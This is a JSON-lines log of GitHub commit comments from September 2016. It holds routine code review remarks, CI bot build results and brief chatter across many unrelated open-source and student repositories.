{"id":"4534354788","type":"CommitCommentEvent","actor":{"login":"Xelwon"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":18945662,"position":null,"line":null,"path":null,"commit_id":"60a2ef187080c3f7e2eb40342ba438e1bc301c0d","created_at":"2016-09-08T14:26:10Z","updated_at":"2016-09-08T14:26:10Z","body":"XD"}},"created_at":"2016-09-08T14:26:10Z"}
{"id":"4534355321","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945665,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:26:15Z","updated_at":"2016-09-08T14:26:15Z","body":"@CPSC310Bot #d1"}},"created_at":"2016-09-08T14:26:15Z"}
{"id":"4534355423","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945666,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:26:16Z","updated_at":"2016-09-08T14:26:16Z","body":"Request received; should be processed within 2 minutes."}},"created_at":"2016-09-08T14:26:16Z"}
{"id":"4534356528","type":"CommitCommentEvent","actor":{"login":"Snaipe"},"repo":{"name":"gdamore/nanomsg"},"payload":{"comment":{"id":18945670,"position":5,"line":43,"path":"CMakeLists.txt","commit_id":"aa5c94cae9ebc39e2efd0ee266899a96792ff633","created_at":"2016-09-08T14:26:25Z","updated_at":"2016-09-08T14:26:25Z","body":"`lib` should probably be `${CMAKE_INSTALL_LIBDIR}` as some 64-bit platforms use the lib64 (or lib32) directory."}},"created_at":"2016-09-08T14:26:25Z"}
{"id":"4534357046","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18945673,"position":10,"line":87,"path":"scripts/album.js","commit_id":"4c967fb8d6461084398b888a7d1763637047851b","created_at":"2016-09-08T14:26:29Z","updated_at":"2016-09-08T14:26:29Z","body":"why did you set this up as an if within a while? You know a while loop is checking truthy is falsey."}},"created_at":"2016-09-08T14:26:29Z"}
{"id":"4534357710","type":"CommitCommentEvent","actor":{"login":"velopert"},"repo":{"name":"velopert/react-codelab-fundamentals"},"payload":{"comment":{"id":18945677,"position":null,"line":null,"path":null,"commit_id":"b8d2b5cd2cae483d35c0121b2481e5495cc5e29a","created_at":"2016-09-08T14:26:34Z","updated_at":"2016-09-08T14:26:34Z","body":"알고보니까 저 부분은 오류해결만하고 추가적으로 수정 할 부분이 있었습니다.\r\n(localhost 에서 작업해서, 새로고침이 되고있었는지 몰랐네요 :)) )\r\n\r\n새 커밋 확인해주세요."}},"created_at":"2016-09-08T14:26:34Z"}
{"id":"4534363326","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945692,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:27:24Z","updated_at":"2016-09-08T14:27:24Z","body":"6 passing, 3 failing"}},"created_at":"2016-09-08T14:27:24Z"}
{"id":"4534368520","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18945706,"position":null,"line":null,"path":null,"commit_id":"7edc0ce9c9079c9b8f165fa0a6add38abc827de8","created_at":"2016-09-08T14:28:08Z","updated_at":"2016-09-08T14:28:08Z","body":"++"}},"created_at":"2016-09-08T14:28:08Z"}
{"id":"4534370475","type":"CommitCommentEvent","actor":{"login":"drott"},"repo":{"name":"behdad/harfbuzz"},"payload":{"comment":{"id":18945709,"position":null,"line":null,"path":null,"commit_id":"48677345281a93d8829dd37d0480a6062945416a","created_at":"2016-09-08T14:28:21Z","updated_at":"2016-09-08T14:28:21Z","body":"Compare https://codereview.chromium.org/2173883002#msg6 - the value might be 0x60001, `kCTVersionNumber10_9 + 1`\r\n\r\nRobert commented in that CL:\r\n\r\n\"This still crashes for me, so I added some logging:\r\n\r\n```\r\nprintf(\"CTGetCoreTextVersion = %p ==> %d <= %d\\n\", &CTGetCoreTextVersion, CTGetCoreTextVersion(), kCTVersionNumber10_9);\r\n\r\nThat prints:\r\nCTGetCoreTextVersion = 0x7fff8d6258b8 ==> 393217 <= 393216\r\n\r\nhex(393217) = '0x60001'\r\nhex(393216) = '0x60000'\r\n```\r\n\r\nI don't know where/if 0x60001 is defined--definitely not in CoreText.h.\""}},"created_at":"2016-09-08T14:28:21Z"}
{"id":"4534372926","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18945717,"position":18,"line":95,"path":"scripts/album.js","commit_id":"4c967fb8d6461084398b888a7d1763637047851b","created_at":"2016-09-08T14:28:42Z","updated_at":"2016-09-08T14:28:42Z","body":"you should definitely not leave alerts in production code like this! What would your user think seeing this?"}},"created_at":"2016-09-08T14:28:42Z"}
{"id":"4534373653","type":"CommitCommentEvent","actor":{"login":"asnys"},"repo":{"name":"MoreEventsMod/More_Events_Mod_Beta"},"payload":{"comment":{"id":18945719,"position":null,"line":null,"path":null,"commit_id":"1fad449c167a46e95457b4b78a5ed364bb4b95e8","created_at":"2016-09-08T14:28:49Z","updated_at":"2016-09-08T14:28:49Z","body":"I intentionally used the mining station, but I have no objection if you want to change it.\r\n\r\nHere's my reasoning: I wanted you to be able to continue getting minerals from this object, because it didn't really make sense to me that you wouldn't be able to, and I didn't want to take something away from the player.   So this asteroid is going to be generating both minerals and society points, so you're either going to have a mining station generating research, or a research station generating minerals.   I thought the mining station generating research made more sense, especially since you're getting the society points by mining fossils.\r\n\r\nLike I said, though, I'm not married to this approach, and if you want to change it, feel free."}},"created_at":"2016-09-08T14:28:49Z"}
{"id":"4534374120","type":"CommitCommentEvent","actor":{"login":"amorag"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18945720,"position":null,"line":null,"path":null,"commit_id":"adfc3d01e0480c8b4a290d863dd81bb89ec56f4b","created_at":"2016-09-08T14:28:53Z","updated_at":"2016-09-08T14:28:53Z","body":"By whoever.  ;D\r\nIf nobody does, I guess Pedro or me wil do it.\r\n\r\nThis way I locate where (in the text) are the tasks have to be done."}},"created_at":"2016-09-08T14:28:53Z"}
{"id":"4534374777","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945725,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:28:59Z","updated_at":"2016-09-08T14:28:59Z","body":"@CPSC310Bot #d2"}},"created_at":"2016-09-08T14:28:59Z"}
{"id":"4534374910","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945726,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:29:01Z","updated_at":"2016-09-08T14:29:01Z","body":"Request received; should be processed within 2 minutes.\nWarn: Invalid deliverable specified, using latest."}},"created_at":"2016-09-08T14:29:01Z"}
{"id":"4534379008","type":"CommitCommentEvent","actor":{"login":"lsk21kr"},"repo":{"name":"2016UGRP-PSWG/simulator"},"payload":{"comment":{"id":18945740,"position":5,"line":6,"path":"PSWG/Physics/Grid.h","commit_id":"d2a98493378704d63cb6ebf8b334c85b2c90f7ea","created_at":"2016-09-08T14:29:37Z","updated_at":"2016-09-08T14:29:37Z","body":"입자 개수를 그리드 개수보다 반드시 많게 할 것. 안 그럼 실행/계산이 되지 않는다."}},"created_at":"2016-09-08T14:29:37Z"}
{"id":"4534382295","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945746,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:30:09Z","updated_at":"2016-09-08T14:30:09Z","body":"6 passing, 3 failing"}},"created_at":"2016-09-08T14:30:09Z"}
{"id":"4534383137","type":"CommitCommentEvent","actor":{"login":"lsk21kr"},"repo":{"name":"2016UGRP-PSWG/simulator"},"payload":{"comment":{"id":18945747,"position":null,"line":null,"path":null,"commit_id":"d2a98493378704d63cb6ebf8b334c85b2c90f7ea","created_at":"2016-09-08T14:30:18Z","updated_at":"2016-09-08T14:30:18Z","body":"안 쓰는 list 제거. 까먹고 제목에 안 씀."}},"created_at":"2016-09-08T14:30:18Z"}
{"id":"4534385861","type":"CommitCommentEvent","actor":{"login":"AlexPeshkoff"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18945759,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T14:30:40Z","updated_at":"2016-09-08T14:30:40Z","body":"Dedicated namespace for RDB$GET_CONTEXT seems to be the best solution. Not short most syntax - but the most logical for our dialect of SQL"}},"created_at":"2016-09-08T14:30:40Z"}
{"id":"4534386575","type":"CommitCommentEvent","actor":{"login":"nrod80"},"repo":{"name":"nrod80/seat-optimization"},"payload":{"comment":{"id":18945761,"position":1,"line":1,"path":"history.txt","commit_id":"76127fe1cd59dac88b680bf19bd5fcc39499ce0d","created_at":"2016-09-08T14:30:46Z","updated_at":"2016-09-08T14:30:46Z","body":"this whole thing was a bad idea"}},"created_at":"2016-09-08T14:30:46Z"}
{"id":"4534390040","type":"CommitCommentEvent","actor":{"login":"jamespjh"},"repo":{"name":"jamespjh/teaching-example-20160908"},"payload":{"comment":{"id":18945766,"position":4,"line":8,"path":"mountains.md","commit_id":"a0b154b01399723d00909e6d452e348922249632","created_at":"2016-09-08T14:31:17Z","updated_at":"2016-09-08T14:31:17Z","body":"Stupid coder! Do better work."}},"created_at":"2016-09-08T14:31:17Z"}
{"id":"4534390082","type":"CommitCommentEvent","actor":{"login":"namakoro"},"repo":{"name":"femtope/project_academy"},"payload":{"comment":{"id":18945767,"position":null,"line":null,"path":null,"commit_id":"0e65c01c33e8cdf2aa1cc7563736f610118c98d9","created_at":"2016-09-08T14:31:17Z","updated_at":"2016-09-08T14:31:17Z","body":"readme for user's guide"}},"created_at":"2016-09-08T14:31:17Z"}
{"id":"4534390465","type":"CommitCommentEvent","actor":{"login":"RenatoJardimParducci"},"repo":{"name":"RenatoJardimParducci/Teste3SIA"},"payload":{"comment":{"id":18945769,"position":null,"line":null,"path":null,"commit_id":"cf3378903316c527b52a9f0ce7ce062b8f5eaa99","created_at":"2016-09-08T14:31:20Z","updated_at":"2016-09-08T14:31:20Z","body":"Mudanca ilustrativa"}},"created_at":"2016-09-08T14:31:20Z"}
{"id":"4534391294","type":"CommitCommentEvent","actor":{"login":"igoorito"},"repo":{"name":"igoorito/Fiapaozinho-versao-igao"},"payload":{"comment":{"id":18945771,"position":null,"line":null,"path":null,"commit_id":"d7c1c6a8baedf0938a9b87c784dd1fb0c40e5946","created_at":"2016-09-08T14:31:27Z","updated_at":"2016-09-08T14:31:27Z","body":"mudei de novo"}},"created_at":"2016-09-08T14:31:27Z"}
{"id":"4534393036","type":"CommitCommentEvent","actor":{"login":"julien-f"},"repo":{"name":"vatesfr/xo-web"},"payload":{"comment":{"id":18945774,"position":15,"line":24,"path":"src/xo-app/vm/tab-console.js","commit_id":"16aa2e8085c657789f623169688f37bedb336538","created_at":"2016-09-08T14:31:42Z","updated_at":"2016-09-08T14:31:42Z","body":"Move the test inside the `if` condition."}},"created_at":"2016-09-08T14:31:42Z"}
{"id":"4534395011","type":"CommitCommentEvent","actor":{"login":"julien-f"},"repo":{"name":"vatesfr/xo-web"},"payload":{"comment":{"id":18945781,"position":29,"line":63,"path":"src/xo-app/vm/tab-console.js","commit_id":"16aa2e8085c657789f623169688f37bedb336538","created_at":"2016-09-08T14:31:59Z","updated_at":"2016-09-08T14:31:59Z","body":"Why did you had a container?"}},"created_at":"2016-09-08T14:31:59Z"}
{"id":"4534396036","type":"CommitCommentEvent","actor":{"login":"mishoo"},"repo":{"name":"jneen/pjs"},"payload":{"comment":{"id":18945786,"position":35,"line":21,"path":"src/p.js","commit_id":"ce359cb45ada16489b12ebb8dd3582b08dc46b27","created_at":"2016-09-08T14:32:10Z","updated_at":"2016-09-08T14:32:10Z","body":"There is one, but it isn't pretty :-\\  Create your constructor as code (string) and give it the appropriate name, then eval it, e.g. `var C = new Function(\"Bare\", \"return function MyAwesomeObject(){ var self = new Bare; ... }\")(Bare)`.  (but then, you should require the caller code to give you the name, `MyAwesomeObject`)"}},"created_at":"2016-09-08T14:32:10Z"}
{"id":"4534397132","type":"CommitCommentEvent","actor":{"login":"DerekRS"},"repo":{"name":"NanoDesuTranslations/editor"},"payload":{"comment":{"id":18945792,"position":null,"line":null,"path":null,"commit_id":"f466994fb12dd2460c3434ad6e5f77c1bbc529c8","created_at":"2016-09-08T14:32:18Z","updated_at":"2016-09-08T14:32:18Z","body":"Need to check whether we're using any class directives.  Otherwise, these look like good changes."}},"created_at":"2016-09-08T14:32:18Z"}
{"id":"4534398187","type":"CommitCommentEvent","actor":{"login":"behdad"},"repo":{"name":"behdad/harfbuzz"},"payload":{"comment":{"id":18945796,"position":null,"line":null,"path":null,"commit_id":"48677345281a93d8829dd37d0480a6062945416a","created_at":"2016-09-08T14:32:27Z","updated_at":"2016-09-08T14:32:27Z","body":"Can we just use the hex number and link to bug?"}},"created_at":"2016-09-08T14:32:27Z"}
{"id":"4534398860","type":"CommitCommentEvent","actor":{"login":"nullprobe"},"repo":{"name":"adaptivethreat/BloodHound"},"payload":{"comment":{"id":18945799,"position":null,"line":null,"path":null,"commit_id":"c6ad08a93880e44eba689ee6f286663532cfb354","created_at":"2016-09-08T14:32:33Z","updated_at":"2016-09-08T14:32:33Z","body":"Still crashes on me. Memory runs out pretty fast..."}},"created_at":"2016-09-08T14:32:33Z"}
{"id":"4534401349","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18945804,"position":null,"line":null,"path":null,"commit_id":"8c4a1fd26f9d111638b72e31adc5c4658f8b0af1","created_at":"2016-09-08T14:32:54Z","updated_at":"2016-09-08T14:32:54Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 970](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12960&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:34"}},"created_at":"2016-09-08T14:32:54Z"}
{"id":"4534406566","type":"CommitCommentEvent","actor":{"login":"julien-f"},"repo":{"name":"vatesfr/xo-web"},"payload":{"comment":{"id":18945817,"position":29,"line":63,"path":"src/xo-app/vm/tab-console.js","commit_id":"16aa2e8085c657789f623169688f37bedb336538","created_at":"2016-09-08T14:33:42Z","updated_at":"2016-09-08T14:33:42Z","body":"Makes sense."}},"created_at":"2016-09-08T14:33:42Z"}
{"id":"4534408889","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18945824,"position":null,"line":null,"path":null,"commit_id":"8176d0a91a31ed60d8770cea16668cb44b68cee8","created_at":"2016-09-08T14:34:02Z","updated_at":"2016-09-08T14:34:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 971](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12966&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T14:34:02Z"}
{"id":"4534415724","type":"CommitCommentEvent","actor":{"login":"trowski"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18945845,"position":null,"line":null,"path":null,"commit_id":"aa9d0b990e335f945355b5c8251d82a0aab78d48","created_at":"2016-09-08T14:35:02Z","updated_at":"2016-09-08T14:35:02Z","body":"We'll have to make it clear in the docs then that an app needs to define a proper loop error handler.\r\n\r\nThere is still the possibility that `tryAppOnError` could throw if a logger was misconfigured or `doClose` threw something other than a `ClientException`. Not sure if these things are really possible, but it seems like bad practice to completely ignore the result of an awaitable."}},"created_at":"2016-09-08T14:35:02Z"}
{"id":"4534415969","type":"CommitCommentEvent","actor":{"login":"angaither"},"repo":{"name":"DoSomething/northstar"},"payload":{"comment":{"id":18945846,"position":2,"line":2,"path":"app/helpers.php","commit_id":"ebe4007b52878562b257f27c31f733356c91ee77","created_at":"2016-09-08T14:35:05Z","updated_at":"2016-09-08T14:35:05Z","body":"😹 "}},"created_at":"2016-09-08T14:35:05Z"}
{"id":"4534417031","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18945848,"position":37,"line":198,"path":"scripts/album.js","commit_id":"4c967fb8d6461084398b888a7d1763637047851b","created_at":"2016-09-08T14:35:16Z","updated_at":"2016-09-08T14:35:16Z","body":"what's this for?"}},"created_at":"2016-09-08T14:35:16Z"}
{"id":"4534420951","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"IntelOrca/OpenRCT2"},"payload":{"comment":{"id":18945857,"position":128,"line":337,"path":"src/rct1.h","commit_id":"193309025696cd7476768673f400b48f33ac3d33","created_at":"2016-09-08T14:35:48Z","updated_at":"2016-09-08T14:35:48Z","body":"Yes, change to the main develop branch."}},"created_at":"2016-09-08T14:35:48Z"}
{"id":"4534422749","type":"CommitCommentEvent","actor":{"login":"DFurnes"},"repo":{"name":"DoSomething/northstar"},"payload":{"comment":{"id":18945861,"position":2,"line":2,"path":"app/helpers.php","commit_id":"ebe4007b52878562b257f27c31f733356c91ee77","created_at":"2016-09-08T14:36:06Z","updated_at":"2016-09-08T14:36:06Z","body":"😉 "}},"created_at":"2016-09-08T14:36:06Z"}
{"id":"4534435033","type":"CommitCommentEvent","actor":{"login":"minghuidu"},"repo":{"name":"airbnb/javascript"},"payload":{"comment":{"id":18945895,"position":null,"line":null,"path":null,"commit_id":"f9abc7cc995aab7ca6826b042436f0da7f8ebaf2","created_at":"2016-09-08T14:37:51Z","updated_at":"2016-09-08T14:37:51Z","body":"good"}},"created_at":"2016-09-08T14:37:51Z"}
{"id":"4534435014","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"Mariick/toolbar"},"payload":{"comment":{"id":18945896,"position":null,"line":null,"path":null,"commit_id":"f756ee6c2868f703b5ff071b434cb6346e40dc5c","created_at":"2016-09-08T14:37:53Z","updated_at":"2016-09-08T14:37:53Z","body":"Hello. how to call the remove function in the event toolbarHidden?"}},"created_at":"2016-09-08T14:37:53Z"}
{"id":"4534438363","type":"CommitCommentEvent","actor":{"login":"ligi"},"repo":{"name":"chibatching/Kotpref"},"payload":{"comment":{"id":18945904,"position":null,"line":null,"path":null,"commit_id":"143107183dc914e2a549b748b5b597ef364a659b","created_at":"2016-09-08T14:38:23Z","updated_at":"2016-09-08T14:38:23Z","body":"This is one really interesting way to initialize things!"}},"created_at":"2016-09-08T14:38:23Z"}
{"id":"4534438926","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18945906,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T14:38:28Z","updated_at":"2016-09-08T14:38:28Z","body":"its okay dude. :)"}},"created_at":"2016-09-08T14:38:28Z"}
{"id":"4534445508","type":"CommitCommentEvent","actor":{"login":"ijokarumawak"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18945916,"position":48,"line":197,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/authorization/StandardAuthorizableLookup.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T14:39:25Z","updated_at":"2016-09-08T14:39:25Z","body":"Maybe I'm missing something, but adding these type check and IllegalArgumentException to DataTransferResource will not be enough?"}},"created_at":"2016-09-08T14:39:25Z"}
{"id":"4534453412","type":"CommitCommentEvent","actor":{"login":"rbohl"},"repo":{"name":"sez11a/liferay-docs"},"payload":{"comment":{"id":18945932,"position":29,"line":52,"path":"discover/deployment/articles/03-maintaining-liferay/liferay-enterprise-search/01-configuring-elasticsearch.markdown","commit_id":"663a297a7758f49bd02e776549285ab5b3317590","created_at":"2016-09-08T14:40:35Z","updated_at":"2016-09-08T14:40:35Z","body":"@sez11a  Per our conversation yesterday, should this note (below) be removed and added to a dev/testing tutorial on Elasticsearch?"}},"created_at":"2016-09-08T14:40:35Z"}
{"id":"4534456603","type":"CommitCommentEvent","actor":{"login":"ijokarumawak"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18945940,"position":28,"line":139,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/web/api/DataTransferResource.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T14:41:03Z","updated_at":"2016-09-08T14:41:03Z","body":"How about adding type check and IllegalArgumentException here?"}},"created_at":"2016-09-08T14:41:03Z"}
{"id":"4534457113","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"gorhill/uBO-WebSocket"},"payload":{"comment":{"id":18945942,"position":97,"line":97,"path":"contentscript.js","commit_id":"a4c85f0ae004e332e932b6d6452e3fa75fc6f7f8","created_at":"2016-09-08T14:41:09Z","updated_at":"2016-09-08T14:41:09Z","body":"How you you do it?"}},"created_at":"2016-09-08T14:41:09Z"}
{"id":"4534460436","type":"CommitCommentEvent","actor":{"login":"dgryski"},"repo":{"name":"dgryski/carbonapi"},"payload":{"comment":{"id":18945948,"position":null,"line":null,"path":null,"commit_id":"54b58b726bc4911137ba0ecd694c7867fe99fcc1","created_at":"2016-09-08T14:41:35Z","updated_at":"2016-09-08T14:41:35Z","body":"This broke accessing /debug/vars and /debug/pprof since we're no longer using the `DefaultServeMux`."}},"created_at":"2016-09-08T14:41:35Z"}
{"id":"4534461473","type":"CommitCommentEvent","actor":{"login":"mcgilman"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18945952,"position":48,"line":197,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/authorization/StandardAuthorizableLookup.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T14:41:43Z","updated_at":"2016-09-08T14:41:43Z","body":"Technically yes, but I've avoided having to cast stuff coming out of the AuthorizableLookup. In cases where we've needed additional insight about the underlying components, I've explicitly provided access through a well-defined API."}},"created_at":"2016-09-08T14:41:43Z"}
{"id":"4534465852","type":"CommitCommentEvent","actor":{"login":"DanielCXT"},"repo":{"name":"Ludeon/RimWorld-PortugueseBrazilian"},"payload":{"comment":{"id":18945971,"position":null,"line":null,"path":null,"commit_id":"bb02d56b63fd0ca4684ec92d1c32a9303b4444aa","created_at":"2016-09-08T14:42:22Z","updated_at":"2016-09-08T14:42:22Z","body":"Troque medicina por remédios ou medicamentos. Um exemplo é na linha 40/41."}},"created_at":"2016-09-08T14:42:22Z"}
{"id":"4534466387","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"Tesla-M-Devices/android_device_motorola_lux"},"payload":{"comment":{"id":18945973,"position":4,"line":38,"path":"init/init_lux.cpp","commit_id":"a48f0f9b5b5498e2a207f4b46e11b01db8952882","created_at":"2016-09-08T14:42:26Z","updated_at":"2016-09-08T14:42:26Z","body":"i can see this was needed for sure xD"}},"created_at":"2016-09-08T14:42:26Z"}
{"id":"4534467053","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18945978,"position":null,"line":null,"path":null,"commit_id":"8176d0a91a31ed60d8770cea16668cb44b68cee8","created_at":"2016-09-08T14:42:32Z","updated_at":"2016-09-08T14:42:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 971](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12966&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:29"}},"created_at":"2016-09-08T14:42:32Z"}
{"id":"4534469721","type":"CommitCommentEvent","actor":{"login":"SeregaGit"},"repo":{"name":"SeregaGit/Work_with_tables"},"payload":{"comment":{"id":18945983,"position":null,"line":null,"path":null,"commit_id":"063fbeba9cc755c774a67c1afac1749ccec855e3","created_at":"2016-09-08T14:42:55Z","updated_at":"2016-09-08T14:42:55Z","body":"q"}},"created_at":"2016-09-08T14:42:55Z"}
{"id":"4534469807","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18945985,"position":23,"line":23,"path":"fcrepo-import-export-common/src/main/java/org/fcrepo/importexport/AuthorizationRequiredRuntimeException.java","commit_id":"93cf3ee0273bf14500b8fcf0729f2f2fca6bb9cb","created_at":"2016-09-08T14:42:56Z","updated_at":"2016-09-08T14:42:56Z","body":"Ok, I'm really not trying to be annoying here, but shouldn't this be `AuthenticationRequiredRuntimeException` if it's being used to translate a 401 (\"The request requires user authentication.\")? `AuthorizationRequiredRuntimeException` would be more like a 403 (\"The server understood the request, but is refusing to fulfill it.\"), no?"}},"created_at":"2016-09-08T14:42:56Z"}
{"id":"4534469964","type":"CommitCommentEvent","actor":{"login":"cat316874"},"repo":{"name":"cat316874/computationalphysics_N2015335550054"},"payload":{"comment":{"id":18945986,"position":3,"line":3,"path":"README.md","commit_id":"5ebe1d2ba372719a45ec22167c3575d056344bbd","created_at":"2016-09-08T14:42:58Z","updated_at":"2016-09-08T14:42:58Z","body":"#print (Exercise_04:Chapter 1 problem 1.5:The decay of two kinds ofparticles"}},"created_at":"2016-09-08T14:42:58Z"}
{"id":"4534469993","type":"CommitCommentEvent","actor":{"login":"ijokarumawak"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18945987,"position":34,"line":143,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/web/api/DataTransferResource.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T14:42:58Z","updated_at":"2016-09-08T14:42:58Z","body":"If we only use the RootGroupPortAuthorizable to get the RootGroupPort instance, I'd prefer simpler code because it doesn't authorize. Excuse me if I'm missing something."}},"created_at":"2016-09-08T14:42:58Z"}
{"id":"4534472286","type":"CommitCommentEvent","actor":{"login":"kuon"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18945992,"position":54,"line":714,"path":"lib/ecto/query.ex","commit_id":"640e8f5f7f97eab68e4eebcd517803f71d90ebc1","created_at":"2016-09-08T14:43:20Z","updated_at":"2016-09-08T14:43:20Z","body":"Awesome.\n\nThe change where so subtle, I wasn't sure it would support everything that was \"requested\" in #1272.\n\nThanks a lot.\n"}},"created_at":"2016-09-08T14:43:20Z"}
{"id":"4534472541","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18945993,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T14:43:22Z","updated_at":"2016-09-08T14:43:22Z","body":"Okay, wait a minute."}},"created_at":"2016-09-08T14:43:22Z"}
{"id":"4534474327","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18946002,"position":null,"line":null,"path":null,"commit_id":"e7c77229481ed6b754984c5dfb6f5624acee41ab","created_at":"2016-09-08T14:43:37Z","updated_at":"2016-09-08T14:43:37Z","body":"\"Debug\" in this context is limited to lack of *`-DNDEBUG`*, which means asserts will fire if something goes wrong.\r\n\r\nWe may be able to lower optimizations to `-O1`, but we have to check SunCC's docs. I seem to recall Sun always applies `-O2` or `-O3`."}},"created_at":"2016-09-08T14:43:37Z"}
{"id":"4534477588","type":"CommitCommentEvent","actor":{"login":"mcgilman"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18946012,"position":28,"line":139,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/web/api/DataTransferResource.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T14:44:08Z","updated_at":"2016-09-08T14:44:08Z","body":"I don't believe a client of the AuthorizableLookup should need to cast anything. The API should provide access to what they may need."}},"created_at":"2016-09-08T14:44:08Z"}
{"id":"4534479061","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18946015,"position":null,"line":null,"path":null,"commit_id":"61eacc54085e3ae3833e9eed13d4401ae220731d","created_at":"2016-09-08T14:44:18Z","updated_at":"2016-09-08T14:44:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KniPP_xMQd6eO27b33dHWA"}},"created_at":"2016-09-08T14:44:18Z"}
